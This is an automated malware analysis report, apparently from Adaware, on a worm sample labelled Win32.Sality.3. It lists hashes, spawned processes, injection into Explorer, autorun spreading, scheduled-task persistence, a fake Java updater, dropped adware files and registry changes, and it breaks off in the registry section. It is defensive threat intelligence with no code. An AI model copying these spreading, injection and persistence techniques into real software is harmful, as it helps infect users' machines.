Win32.Sality.3_df19badc8d – Adaware

Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Worm, Virus, WormAutorun

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: df19badc8d07c6bee18a57e61ea387c2

SHA1: 2b7c6da2e61c98224b23f712beeaf74ba38c0787

SHA256: 3b08960f3416e9adf2f25fc702b4bbff4a716875de20f7035615ce17b717e588

SSDeep: 393216:Jm27XOLzs3pUzZyj2wps8oEmTRoUeBxI:Jm27gzs3pUzMjfGoUe

Size: 13067784 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: YourTemplateFinder

Created at: 2012-12-04 15:55:11

Analyzed on: WindowsXPESX SP3 32-bit

Summary: Worm. A program that is primarily replicating on networks or removable drives.

Dynamic Analysis

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

Process activity

The Worm creates the following process(es):

Ge-Force-codedownloader.exe:2504
Ge-Force-codedownloader.exe:2564
regsvr32.exe:2416
Khtmovq.exe:664
%original file name%.exe:1616
mscorsvw.exe:172
Ge-Force-bg.exe:2632

The Worm injects its code into the following process(es):

Explorer.EXE:2032

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process Ge-Force-codedownloader.exe:2564 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\manifest[1].xml (25 bytes)

The process Khtmovq.exe:664 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\184[1].js (25 bytes)
%Program Files%\Ge-Force\utils.exe (86583 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (35246 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (415 bytes)
%Program Files%\Ge-Force\Ge-Force.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\288[1].js (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (1 bytes)
%Program Files%\Ge-Force\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\337[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (3312 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\262[1].js (25 bytes)
%Program Files%\Ge-Force\Ge-Force-codedownloader.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (27704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (579 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (905 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (141808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (784 bytes)
%Program Files%\Ge-Force\Ge-Force-bho.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (5 bytes)
%Program Files%\Ge-Force\Ge-Force-bg.exe (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (410 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB7.tmp (662466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W5QGY4W6\356[1].js (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\350[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (809 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (825 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (997 bytes)
%Program Files%\Ge-Force\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (31281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\91[1].js (86817 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (1552 bytes)
%WinDir%\Tasks\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (14 bytes)
%Program Files%\Ge-Force\Ge-Force-buttonutil.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\ipgeoapi[1] (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GP2JGLQF\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHE4VINB\app_code[1].js (2977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\RP80DVHJ\desktop.ini (67 bytes)
%Program Files%\Ge-Force\55b9f9b3-a933-4e78-9f2c-145eb2174f55-5.exe (7726 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\192.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\286.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\301.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\329201 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\345.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\263.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\354.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\253.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\281.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\55b9f9b3-a933-4e78-9f2c-145eb2174f55-1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\123.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\67844 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\273.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\200.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\180.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\plugins\221.js (0 bytes)

The process %original file name%.exe:1616 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (4404939 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0014C62D_Rar\%original file name%.exe (99596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (419460 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (2426 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\vbijkl.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Kuoyj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsvB5.tmp\Khtmovq.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszB4.tmp (0 bytes)

Registry activity

The process Ge-Force-codedownloader.exe:2504 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
